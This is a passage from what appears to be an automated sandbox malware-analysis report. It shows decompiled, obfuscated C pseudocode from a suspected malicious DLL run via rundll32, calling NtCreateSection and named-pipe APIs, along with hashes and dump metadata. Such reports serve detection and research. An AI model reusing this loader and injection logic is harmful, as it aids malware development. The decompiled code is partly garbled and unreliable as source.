                				 *((intOrPtr*)(_t683 + 0x5d0)) =  *((intOrPtr*)(_t683 + 0x5d0)) + 0x16ce -  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x440));
                				asm("cdq");
                				 *(__rdx + 0x60c) = _t683;
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x110)) + 0x390)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248));
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x248)) - 1;
                				_t455 = r10d -  *((intOrPtr*)(__rdx + 0x604));
                				if (_t455 < 0) goto 0x535f7bf3;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) + (_t433 & r14d);
                				if (_t455 >= 0) goto 0x535f7d82;
                				_t494 =  *((intOrPtr*)(__rdx + 0x430));
                				if (( *((intOrPtr*)(__rdx + 0x618)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f7d9d;
                				r8d =  *(_t494 +  *(__rdx + 0x608) * 4);
                				asm("inc ecx");
                				goto 0x535f7da8;
                				r8d =  *(_t494 +  *(__rdx + 0x608) * 4);
                				r9d = r9d + _t431;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
                				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7ba8;
                				 *((long long*)(__rdx + 0x600)) = 0x3b610b;
                				r9d = _t449;
                				 *(__rdx + 0x608) = 7;
                				r11d = 0x1b47;
                				 *(__rdx + 0x60c) = 4;
                				 *((long long*)(__rdx + 0x610)) = 0xf6da;
                				 *((long long*)(__rdx + 0x614)) = 0x18551;
                				 *((long long*)(__rdx + 0x604)) = 0xe5;
                				 *((long long*)(__rdx + 0x618)) = 8;
                				 *( *((intOrPtr*)(__rdx + 0x108)) + 0x4b8) =  *( *((intOrPtr*)(__rdx + 0x108)) + 0x4b8) ^ 0x000010ae;
                				 *((long long*)(__rdx + 0x61c)) = 0xb;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x608) * 4)) +  *((intOrPtr*)(__rdx + 0x610));
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x430)) +  *(__rdx + 0x60c) * 4)) +  *((intOrPtr*)(__rdx + 0x614));
                				 *( *((intOrPtr*)(__rdx + 0x240)) + 0x310) =  *( *((intOrPtr*)(__rdx + 0x240)) + 0x310) ^ ( *( *((intOrPtr*)(__rdx + 0x20)) + 0x128) | _t747);
                				if ( *((intOrPtr*)(__rdx + 0x600)) <= 0) goto 0x535f804d;
                				r10d = _t449;
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x160)) + 0x128)) = 0x1b3e5bc;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x160)) + 0x90)) +  *( *((intOrPtr*)(__rdx + 0x358)) + 0x128) - 0x1ba7;
                				_t459 =  *((intOrPtr*)(__rdx + 0x604));
                				if (_t459 <= 0) goto 0x535f7fb1;
                				_t729 =  *((intOrPtr*)(__rdx + 0x430));
                				_t436 =  *(_t729 +  *(__rdx + 0x60c) * 4);
                				 *(_t729 +  *(__rdx + 0x608) * 4) =  *(_t729 +  *(__rdx + 0x608) * 4) ^ _t436;
                				_t437 = _t436 & r14d;
                				if (_t459 >= 0) goto 0x535f7efe;
                				_t691 =  *((intOrPtr*)(__rdx + 0x430));
                				r8d =  *(_t691 +  *(__rdx + 0x608) * 4);
                				if (( *((intOrPtr*)(__rdx + 0x61c)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f7f17;
                				asm("inc ecx");
                				r10d = r10d + _t431;
                				 *((intOrPtr*)(_t691 +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)(_t691 +  *(__rdx + 0x60c) * 4)) + r8d;
                				_t625 =  *((intOrPtr*)(__rdx + 0x108));
                				 *(__rdx + 0x128) =  *(__rdx + 0x128) ^  *_t625;
                				 *_t625 =  *_t625 + 1;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x240)) + 0x140)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x240)) + 0x140)) +  *((intOrPtr*)(__rdx + 0x108)) - 0xffffff80;
                				asm("cdq");
                				 *(__rdx + 0x608) = _t691;
                				asm("cdq");
                				 *(__rdx + 0x60c) = _t691;
                				 *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) =  *( *((intOrPtr*)(__rdx + 0x2a0)) + 0x230) * ( *( *((intOrPtr*)(__rdx + 0x240)) + 0xc8) ^ _t747);
                				_t461 = r10d -  *((intOrPtr*)(__rdx + 0x604));
                				if (_t461 < 0) goto 0x535f7ecf;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) - ( *( *((intOrPtr*)(__rdx + 0x108)) + 0x170) ^ _t744);
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x608) * 4)) + _t437;
                				_t438 = _t437 & r14d;
                				if (_t461 >= 0) goto 0x535f8005;
                				_t517 =  *((intOrPtr*)(__rdx + 0x430));
                				if (( *((intOrPtr*)(__rdx + 0x618)) - 1 | 0xffffffe0) + 1 == 0) goto 0x535f8020;
                				r8d =  *(_t517 +  *(__rdx + 0x608) * 4);
                				asm("inc ecx");
                				goto 0x535f802b;
                				r8d =  *(_t517 +  *(__rdx + 0x608) * 4);
                				r9d = r9d + _t431;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x428)) +  *(__rdx + 0x60c) * 4)) + r8d;
                				if (r9d -  *((intOrPtr*)(__rdx + 0x600)) < 0) goto 0x535f7e8b;
                				_t519 =  *((intOrPtr*)(__rdx + 0x160));
                				 *0x8168488A89001AF4 =  *0x8168488A89001AF4 << 0x8f;
                				_t419 = _t519;
                				 *_t519 =  *_t519 + _t419;
                				 *((intOrPtr*)(_t519 - 0x75)) =  *((intOrPtr*)(_t519 - 0x75)) + _t438;
                				_t271 = _t519 + 3;
                				 *_t271 = 1;
                				 *_t519 =  *_t519 + _t419;
                				 *(_t519 + 0x1a8) =  *(_t519 + 0x1a8) | _t744;
                				_t521 =  *((intOrPtr*)(__rdx + 0x110)) + 0x238;
                				 *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x358)) + 0x298)) + _t521;
                				 *((intOrPtr*)(_t521 + 5)) =  *((intOrPtr*)(_t521 + 5)) + _t438;
                				asm("adc [eax-0x76b7ffec], bl");
                				_t281 = _t521 - 0x17ffffff;
                				_t710 =  *_t281;
                				 *_t281 = __rdx;
                				asm("jmp dword 0x4789:0x48fffea1");
                				_t522 =  *0x8948fffe;
                				_push(_t522);
                				asm("push es");
                				 *_t522 =  *_t522 + _t419 +  *_t521;
                				 *( *((intOrPtr*)(_t710 + 0x110)) + 0x330) =  *( *((intOrPtr*)(_t710 + 0x20)) + 0x108) * 0x1ba7;
                				 *( *((intOrPtr*)(_t710 + 0x358)) + 0x250) =  *( *((intOrPtr*)(_t710 + 0x358)) + 0x250) |  *(_t710 + 0x240) + 0x00000300;
                				 *((long long*)(_t710 + 0x45c)) =  *((intOrPtr*)( *((intOrPtr*)(_t710 + 0x20)) + 0x68));
                				 *( *((intOrPtr*)(_t710 + 0x2a0)) + 0x130) =  *( *((intOrPtr*)(_t710 + 0x2a0)) + 0x130) |  *( *((intOrPtr*)(_t710 + 0x358)) + 0x4b8);
                				 *( *((intOrPtr*)(_t710 + 0x358)) + 0x4b8) =  *( *((intOrPtr*)(_t710 + 0x358)) + 0x4b8) +  *_t271;
                				 *((long long*)( *(_t710 + 0x240) + 0x3c0)) =  *( *(_t710 + 0x240)) + 0x157a;
                				_t532 =  *((intOrPtr*)(_t710 + 0x45c));
                				 *(_t710 + 0x1b8) = _t532;
                				goto 0x535f84d3;
                				_t533 = _t532 * _t713;
                				_t423 = _t533;
                				if ( *((intOrPtr*)(_t710 + 0x440)) - _t533 >= 0) goto 0x535f84c9;
                				r13d = 0x1582;
                				_t647 = _t414 /  *(__rdx + 0x458) /  *(__rdx + 0x458) /  *(__rdx + 0x458) %  *(__rdx + 0x458);
                				 *(_t724 + 0x58) = _t647;
                				if (_t647 - ( *(_t710 + 0x1a8) ^  *(_t710 + 0x478) ^  *(_t710 + 0x28)) <= 0) goto 0x535f841a;
                				 *((long long*)(_t724 + 0x60)) = _t449;
                				 *(_t710 + 0x2a8) =  *(_t710 + 0xb0) ^ 0x000011f1;
                				r14d = r14d + _t438 - r13d;
                				 *((intOrPtr*)(_t710 + 0x448)) =  *((intOrPtr*)(_t710 + 0x448)) + ( *(_t710 + 0x1c0) ^ 0x00001fda);
                				r14d = r14d * _t423;
                				_t584 = r9d;
                				r8d = r8d * _t423;
                				 *(_t724 + 0x28) =  *((intOrPtr*)(_t710 + 0x138)) -  *(_t710 + 0x70) &  *(_t710 + 0x2c8);
                				 *(_t724 + 0xe8) = r8d;
                				r8d = r8d | r12d;
                				r8d = r8d -  *(_t710 + 0x410);
                				 *(_t724 + 0x20) = ( *(_t710 + 0x90) ^ _t584) *  *(_t710 + 0xd0);
                				InitializeCriticalSection(??);
                				_t655 =  *(_t724 + 0xc0);
                				r9d =  *(_t710 + 0x108);
                				r8d =  *(_t710 + 0xb0);
                				 *(_t724 + 0xe8) =  *(_t724 + 0xe8) ^  *((intOrPtr*)(_t710 + 0x450)) + 0x00001320;
                				 *(_t710 + 0x250) =  *(_t710 + 0x250) ^ ( *(_t710 + 0x108) | _t584);
                				 *((intOrPtr*)(_t710 + 0x110)) =  *((intOrPtr*)(_t710 + 0x110)) - (_t655 |  *(_t710 + 0x340));
                				_t702 =  *(_t724 + 0xb0) - ( *(_t710 + 0x480) |  *(_t724 + 0xb0));
                				_t560 =  *((intOrPtr*)(_t710 + 0x300)) +  *((intOrPtr*)(_t710 + 0x418));
                				 *(_t710 + 0x240) =  *(_t710 + 0x240) + _t560;
                				 *(_t724 + 0xb0) = _t702;
                				 *(_t724 + 0xc0) = _t655 ^ _t560 ^ _t702;
                				 *(_t710 + 0x360) =  *(_t710 + 0x360) |  *((intOrPtr*)(_t710 + 0x2f8)) -  *((intOrPtr*)(_t724 + 0x60)) - 0x00001b47;
                				r8d = r8d &  *(_t710 + 0x240);
                				r11d =  *(_t710 + 0x188);
                				r8d = r8d | _t431;
                				r11d = r11d -  *(_t710 + 0x478);
                				r10d =  *(_t710 + 0x70);
                				r10d = r10d *  *(_t724 + 0xb0);
                				_t565 =  *((intOrPtr*)(_t710 + 0x2e0));
                				r11d = r11d * r9d;
                				r9d =  *(_t710 + 0xd0);
                				r9d = r9d ^  *(_t724 + 0xc0);
                				 *(_t724 + 0x40) = 0x1fda;
                				r9d = r9d ^ 0x00001320;
                				 *(_t724 + 0x38) = _t565;
                				 *(_t724 + 0x30) = r9d;
                				 *(_t724 + 0x28) = r10d;
                				 *(_t724 + 0x20) = r11d;
                				r9d = E00007FFA7FFA535F6E94(_t565,  *(_t724 + 0xd0),  *(_t710 + 0x2a8) ^  *(_t724 + 0xd0) | _t702,  *((intOrPtr*)(_t710 + 0x48)) + _t713 - ( *(_t710 + 0x108) | _t584 | 0x00001515) &  *(_t724 + 0xd0), __rdx, _t710,  *((intOrPtr*)(_t710 + 0x138)) -  *(_t710 + 0x70) &  *(_t710 + 0x2c8));
                				r8d =  *(_t724 + 0xe8);
                				 *(_t724 + 0xb0) = _t565;
                				 *(_t710 + 0x230) =  *(_t710 + 0x230) * ( *((intOrPtr*)(_t710 + 0x178)) +  *(_t724 + 0x58));
                				_t440 = r15d;
                				r8d = r8d ^ _t440;
                				r14d = r14d | _t440;
                				if (_t449 - ( *(_t710 + 0x1a8) ^  *(_t710 + 0x478) ^  *(_t710 + 0x28)) > 0) goto 0x535f81a3;
                				r14d = r14d &  *(_t724 + 0xc0);
                				r14d = r14d & 0x00000bbb;
                				 *((intOrPtr*)(_t710 + 0x298)) =  *((intOrPtr*)(_t710 + 0x298)) - ( *(_t710 + 0x128) & r15d) *  *(_t710 + 0x1b0);
                				 *(_t710 + 0x248) =  *(_t710 + 0x248) -  *(_t710 + 0x410) *  *(_t724 + 0x58);
                				_t430 = ConnectNamedPipe(??, ??);
                				 *(_t710 + 0x4b8) =  *(_t710 + 0x4b8) | ( *(_t710 + 0x470) ^  *(_t710 + 0x140)) * 0x00001355;
                				 *((intOrPtr*)(_t710 + 0x320)) =  *((intOrPtr*)(_t710 + 0x320)) + ( *(_t710 + 0xa0) & r12d);
                				 *((intOrPtr*)(_t710 + 0x168)) =  *((intOrPtr*)(_t710 + 0x168)) - ((_t447 |  *(_t710 + 0x248)) &  *(_t710 + 0x70));
                				goto 0x535f84d3;
                				r12d = r12d | 0x00001ad7;
                				return _t430;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: ConnectCriticalInitializeNamedPipeSection
                • String ID:
                • API String ID: 3855124782-0
                • Opcode ID: ff7cc1d0ecebee6b7c2c6f8861cf9849c3244afc2679fe94427b985759abdd2b
                • Instruction ID: 85e14e36f0efd5a3e8e60e5816fedd36d61ac4f084f8fce2450afecb0f743bfa
                • Opcode Fuzzy Hash: ff7cc1d0ecebee6b7c2c6f8861cf9849c3244afc2679fe94427b985759abdd2b
                • Instruction Fuzzy Hash: 685200B2315A84ABDB5CCF29D6947A9B7A5F788B84F04512ACB6E43750CF35E1B0CB00
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 37%
                			E00007FFA7FFA535F615C(void* __rax, long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r9) {
                				void* __rsi;
                				void* __rbp;
                				void* _t121;
                				void* _t129;
                				signed short _t130;
                				signed short _t136;
                				signed long long _t138;
                				signed int _t153;
                				void* _t165;
                				long long _t173;
                				signed long long _t187;
                				long long _t189;
                				signed long long _t208;
                				long _t222;
                				void* _t227;
                				signed long long _t232;
                				void* _t235;
                				void* _t236;
                				long long* _t241;
                				struct _GUID _t242;
                				long long _t243;
                				struct _EXCEPTION_RECORD _t245;
                				long _t247;
                				HANDLE* _t249;
                
                				 *((long long*)(_t235 + 0x10)) = __rbx;
                				_t236 = _t235 - 0x90;
                				_t153 =  *(_t236 + 0x108);
                				r11d = __r8 - 0x9c7;
                				r10d =  *(_t236 + 0xf8);
                				_t232 =  *(_t236 + 0x110) + 0xffffee0f;
                				_t243 = __rdx;
                				 *(_t236 + 0xe8) = _t232;
                				 *(_t236 + 0xf8) = r11d;
                				r9d =  *(_t236 + 0xf0);
                				r14d = _t153 - 0x2dd;
                				 *(_t236 + 0xd0) = __rdx;
                				 *(_t236 + 0x110) = r14d;
                				r10d = r10d + 0xfffffed1;
                				 *(_t236 + 0x108) = _t153 + 0xd1;
                				 *(_t236 + 0x80) = _t222;
                				 *(_t236 + 0xe0) = _t227;
                				r9d = __r8 - 0x1582;
                				 *(_t236 + 0xf0) = r9d;
                				if (_t222 == _t232 + 0x2114) goto 0x535f654b;
                				if (r9d - _t121 >= 0) goto 0x535f6323;
                				_t241 = __rdx + 0x620;
                				 *(_t236 + 0x30) =  *(_t236 + 0x30) & 0x00000000;
                				 *((long long*)(__rdx + 0x128)) = 0x19f;
                				_t187 = __rcx - 0x89a + 0x9c9;
                				 *(_t236 + 0x28) = 0x8000000;
                				 *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) |  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x3b8)) + 0x00001ec0;
                				 *(__rdx + 0x38c) =  *(__rdx + 0x38c) & 0x00000000;
                				 *((intOrPtr*)(__rdx + 0x388)) =  *((intOrPtr*)(__rdx + 0x348));
                				 *((long long*)(__rdx + 0xf8)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0xb8)) + 0x3c)) +  *((intOrPtr*)(__rdx + 0xb8));
                				 *((long long*)(__rdx + 0x3b0)) =  *((intOrPtr*)(__rdx + 0x288));
                				 *_t241 =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x70)) - 0x1487;
                				 *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) + 0xca2;
                				r8d =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x1b0);
                				r8d = r8d - 0x1f9a;
                				 *(_t236 + 0x20) = r8d;
                				r8d = 0;
                				 *((intOrPtr*)(__rdx + 0x404)) = NtCreateSection(_t249, _t247, _t245, _t242, _t222);
                				goto 0x535f650b;
                				_t165 = __r9 - 0x157a -  *((intOrPtr*)(__rdx + 0x368));
                				if ( *((intOrPtr*)(__rdx + 0x2a8)) != _t165) goto 0x535f650b;
                				if (( *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x148) ^ 0x0000135b) - _t165 - _t241 + _t187 > 0) goto 0x535f637b;
                				_t136 =  *(__rdx + 0x438) & 0x0000ffff ^  *(_t236 + 0xd0) ^ _t130;
                				DisconnectNamedPipe(_t227);
                				r9d =  *(_t236 + 0xf0);
                				r11d =  *(_t236 + 0xf8);
                				if ( *((intOrPtr*)(__rdx + 0x188)) != ( *((intOrPtr*)(__rdx + 0x1d0)) + __r9 + 0x154) * 0x1320) goto 0x535f650b;
                				r13d =  *((intOrPtr*)(__rdx + 0x230));
                				r11d = r11d & 0x00001582;
                				r8d =  *(__rdx + 0x248);
                				r10d =  *(__rdx + 0x3b8);
                				_t138 =  *((intOrPtr*)(__rdx + 0x2a8));
                				r8d = r8d | r14d;
                				r10d = r10d - 0x1ad7;
                				r15d =  *(__rdx + 0x28);
                				r15d = r15d & r9d;
                				r13d = r13d -  *((intOrPtr*)(__rdx + 0xa0));
                				r13d = r13d + _t136;
                				r8d = r8d ^ 0x00000651;
                				r14d = ( *(__rdx + 0x318) ^  *(__rdx + 0x240)) * 0x11f1;
                				 *(_t236 + 0xf8) = r11d;
                				r11d = r9d;
                				r9d = r9d *  *(_t236 + 0x110);
                				r11d = r11d & 0x00002114;
                				 *((long long*)(_t236 + 0x78)) =  *(_t236 + 0x110) *  *(_t236 + 0xd0) + 0x1320;
                				_t173 =  *(_t236 + 0xf8);
                				 *(_t236 + 0x70) = r10d;
                				 *(_t236 + 0x68) = _t187 ^  *(_t236 + 0xe0);
                				 *((long long*)(_t236 + 0x60)) = _t173;
                				 *(_t236 + 0x58) = _t222 + 0x00000932 & 0x000012ad;
                				 *((long long*)(_t236 + 0x50)) = _t227 - 0x651;
                				 *((long long*)(_t236 + 0x48)) = __rdx;
                				 *(_t236 + 0x40) = _t232 &  *(_t236 + 0x108);
                				 *((intOrPtr*)(_t236 + 0x38)) = r13d;
                				 *(_t236 + 0xf0) = r9d;
                				r9d = _t136;
                				 *(_t236 + 0x30) = r14d;
                				 *(_t236 + 0x28) = r15d;
                				 *(_t236 + 0x20) = r11d;
                				E00007FFA7FFA535F9404(_t187 ^  *(_t236 + 0xe0),  *((intOrPtr*)(__rdx + 0x1d0)) + __r9 + 0x154,  *(_t236 + 0xf0), _t227 - 0x651, _t232 &  *(_t236 + 0x108), __r8, _t241);
                				_t189 = _t173;
                				 *(_t243 + 0x2a0) =  *(_t243 + 0x2a0) * (( *(_t243 + 0x58) &  *(_t236 + 0xe8)) + 0x651);
                				 *(_t243 + 0x2d0) =  *(_t243 + 0x5d8) ^ 0x00000bbb;
                				_t102 = _t189 - 0x1625; // -5669
                				if ( *(_t236 + 0x80) - _t102 < 0) goto 0x535f65b2;
                				if ( *((intOrPtr*)(_t243 + 0x404)) == 0) goto 0x535f65b2;
                				 *( *((intOrPtr*)(_t243 + 0x358)) + 0x5e0) =  *( *((intOrPtr*)(_t243 + 0x20)) + 0x390) * 0x1ad7;
                				goto 0x535f65b8;
                				_t208 = _t138;
                				if ( *((intOrPtr*)(_t243 + 0x2f8)) - ( *(_t243 + 0x128) ^ _t208) + 0x145c <= 0) goto 0x535f65b2;
                				if ( *((intOrPtr*)(_t243 + 0x110)) - ( *(_t243 + 0x2a0) | _t208) <= 0) goto 0x535f65b2;
                				_t129 = _t241 + 0x1582;
                				 *(_t243 + 0x3b8) =  *(_t243 + 0x3b8) ^ _t129 +  *((intOrPtr*)(_t243 + 0x298));
                				 *(_t243 + 0xa0) =  *(_t243 + 0xa0) |  *(_t243 + 0x2a8) * 0x000011f1 ^ r11d;
                				return _t129;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: CreateDisconnectNamedPipeSection
                • String ID:
                • API String ID: 4281913487-0
                • Opcode ID: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction ID: 47890ce1e09b5a669ff8df59b86377a81bb2d4d389a92553468a53c5b71d6706
                • Opcode Fuzzy Hash: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction Fuzzy Hash: 7AB16273614AD58AD764CF14E088FEE77A9F388788F024126DB8A57B54EB38D598CB04
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 28%
                			E00007FFA7FFA535FB5B0(void* __edx, void* __eflags, long long __rbx, signed int __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, signed int __r9, void* _a8, void* _a16, void* _a24, long long _a40, long long _a48, long long _a56) {
                				long long _v40;
                				long long _v48;
                				long long _v56;
                				void* _t102;
                				void* _t107;
                				void* _t108;
                				signed long long* _t119;
                				long long _t124;
                				signed long long _t130;
                				void* _t131;
                				intOrPtr _t145;
                				signed long long _t156;
                				signed int _t172;
                				HANDLE* _t175;
                				intOrPtr* _t176;
                				long long _t179;
                				signed int _t183;
                				void* _t185;
                				void* _t195;
                				void* _t196;
                				void* _t199;
                
                				_t195 = _t185;
                				 *((long long*)(_t195 + 8)) = __rbx;
                				 *((long long*)(_t195 + 0x10)) = __rbp;
                				 *((long long*)(_t195 + 0x18)) = __rsi;
                				_t145 =  *0x5367c000; // 0x2151e49def0
                				_t183 = __r9;
                				r15d = __edx;
                				_t176 = __rcx;
                				 *_t119 =  *_t119 | 0x00000004;
                				 *_t119 =  *_t119 + _t102;
                				 *((intOrPtr*)(__r9 + __rcx * 4 - 0x7d)) =  *((intOrPtr*)(__r9 + __rcx * 4 - 0x7d)) + _t108;
                				 *((long long*)(_t119 - 0x75)) =  *((long long*)(_t119 - 0x75)) - 1;
                				_t119[0x9000000] = _t119[0x9000000] | 0xffffff89;
                				_t119[0x9000000] = _t119[0x9000000] ^ 0xffffff8b;
                				_t119[0] = _t119[0] & 0x00000000;
                				 *((intOrPtr*)(_t145 + 0x48 + __r9 * 2)) =  *((intOrPtr*)(_t145 + 0x48 + __r9 * 2)) + _t108;
                				if (__eflags < 0) goto 0x535fb618;
                				r9d = 0x1ec0;
                				 *((long long*)(_t195 - 0x30)) = __r8 + __r9;
                				r8d = 0x181f;
                				 *((long long*)(_t195 - 0x38)) =  *((intOrPtr*)(_t145 +  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x148) * 8 - 0x9820));
                				E00007FFA7FFA535E1000( *((intOrPtr*)(_t145 +  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x148) * 8 - 0x9820)), __rcx, __rsi, _t199, _t196); // executed
                				_t179 = _a56;
                				 *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x410) =  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x410) * 0xc92ffa;
                				_t124 =  *((intOrPtr*)(_t145 + 0x110));
                				 *( *((intOrPtr*)(_t145 + 0x358)) + 0x3a0) =  *( *((intOrPtr*)(_t145 + 0x358)) + 0x3a0) |  *(_t124 + 0x398) ^ 0x0000157a;
                				if (_t179 !=  *((intOrPtr*)(_t145 + 0x2f0))) goto 0x535fb6a1;
                				GetCurrentThreadId();
                				 *((long long*)(_t145 + 0x200)) = _t124;
                				if (_t124 == 0) goto 0x535fb6a1;
                				 *((char*)(_t145 + 0x408)) = 1;
                				_v40 = _t179;
                				 *( *((intOrPtr*)(_t145 + 0x20)) + 0x298) =  *( *((intOrPtr*)(_t145 + 0x20)) + 0x298) ^  *( *((intOrPtr*)(_t145 + 0x240)) + 0x3c0);
                				 *( *((intOrPtr*)(_t145 + 0x240)) + 0x3c0) =  *( *((intOrPtr*)(_t145 + 0x240)) + 0x3c0) - 1;
                				_v48 = _a48;
                				_v56 = _a40;
                				NtCreateSection(_t175, ??, ??, ??, ??, ??);
                				if ( *((char*)(_t145 + 0x408)) == 0) goto 0x535fb732;
                				 *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x3c8) =  *( *((intOrPtr*)(_t145 + 0x2a0)) + 0x3c8) ^ ( *( *((intOrPtr*)(_t145 + 0x5e8)) + 0x3b8) | 0x00001ec0);
                				 *((long long*)(_t145 + 0x308)) =  *_t176;
                				goto 0x535fb7cb;
                				_t172 =  *(_t145 + 0x108);
                				r9d = 0x1b47;
                				_t156 =  *((intOrPtr*)(_t145 + 0x2a0)) + 0x108;
                				r8d = _t183 + 0x60;
                				_t130 =  *(_t172 + 0x5e0) * _t156;
                				 *(_t172 + 0x5e0) = _t130;
                				_t131 = _t130 +  *_t130;
                				 *((intOrPtr*)(_t131 - 0x75)) =  *((intOrPtr*)(_t131 - 0x75)) + _t108;
                				 *((long long*)(_t131 + 0x90)) = _t156 - 0x16ce;
                				_t78 = _t145 + 0x258; // 0x2151e49e148
                				_v40 = _t78 + ( *( *((intOrPtr*)(_t145 + 0x20)) + 0x340) ^ 0x000011f0) * 0xd;
                				_v48 =  *((intOrPtr*)(_t145 + 0x280 + ( *( *((intOrPtr*)(_t145 + 0x358)) + 0x340) ^ 0x000011f0) * 8));
                				_t107 = E00007FFA7FFA535E1000( *((intOrPtr*)(_t145 + 0x280 + ( *( *((intOrPtr*)(_t145 + 0x358)) + 0x340) ^ 0x000011f0) * 8)), _t145, _a40);
                				 *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x5e8)) + 0x40)) =  *((intOrPtr*)( *((intOrPtr*)(_t145 + 0x5e8)) + 0x40)) - ( *(_t145 + 0x108) | 0x00000651);
                				 *( *((intOrPtr*)(_t145 + 0x160)) + 0x128) =  *( *((intOrPtr*)(_t145 + 0x160)) + 0x128) ^  *( *((intOrPtr*)(_t145 + 0x240)) + 0x108) * 0x000016ce;
                				 *( *((intOrPtr*)(_t145 + 0x5e8)) + 0x248) =  *( *((intOrPtr*)(_t145 + 0x5e8)) + 0x248) |  *((intOrPtr*)(_t145 + 0x160)) + 0x00000170;
                				return _t107;
                			}

                APIs
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmp
